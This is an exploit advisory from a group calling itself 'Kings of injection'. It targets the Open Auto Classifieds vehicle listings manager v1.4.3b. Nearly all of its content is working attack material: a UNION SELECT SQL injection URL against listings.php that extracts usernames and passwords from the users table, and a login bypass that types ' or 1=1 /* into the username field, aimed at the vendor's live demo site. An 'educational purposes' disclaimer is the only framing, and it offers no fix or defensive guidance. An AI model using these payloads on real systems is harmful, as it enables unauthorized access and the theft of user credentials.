|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
|     _                   __           __       __          ______     |
|   /' \            __  /'__`\        /\ \__  /'__`\       /\  ___\    |
|  /\_, \    ___   /\_\/\_\L\ \    ___\ \ ,_\/\ \/\ \  _ __\ \ \__/    |
|  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\ \___``\  |
|     \ \ \/\ \/\ \ \ \ \/\ \L\ \/\ \__/\ \ \_\ \ \_\ \ \ \/ \/\ \L\ \ |
|      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\  \ \____/ |
|       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/   \/___/  |
|                  \ \____/ >> Kings of injection                      |
|                   \/___/                                             |
|                                                                      |
|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|

Title :: Remote SQL Injection


Author :: InjEctOr [s0f (at) w.cn]

&& Fisher762 [SQ7 (at) w.cn]



Application :: Open Auto Classifieds vehicle listings manager v1.4.3b

Download :: http://mesh.dl.sourceforge.net/sourceforge/openauto/openauto_v1.4.3b.zip


Dork 1 :: use your mind


Greets :: Allah , Muslims Hackers

Terms of use :: This exploit is just for educational purposes, DO NOT use it for illegal acts.



--------------------------------------------[C o n t e x t]-----------------------------------------


Expl0!t::

url :

http://127.0.0.1/listings.php?id=-1+union+select+1,2,3,concat(user,0x3a,pass),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+users


and  bypass login:

http://openautoclassifieds.com/login.php << from demo site :)

in Username field just type ' or 1=1 /*


note:

there is a lot of versions in this script and every one using Different number of columns but the name of tbl and col is same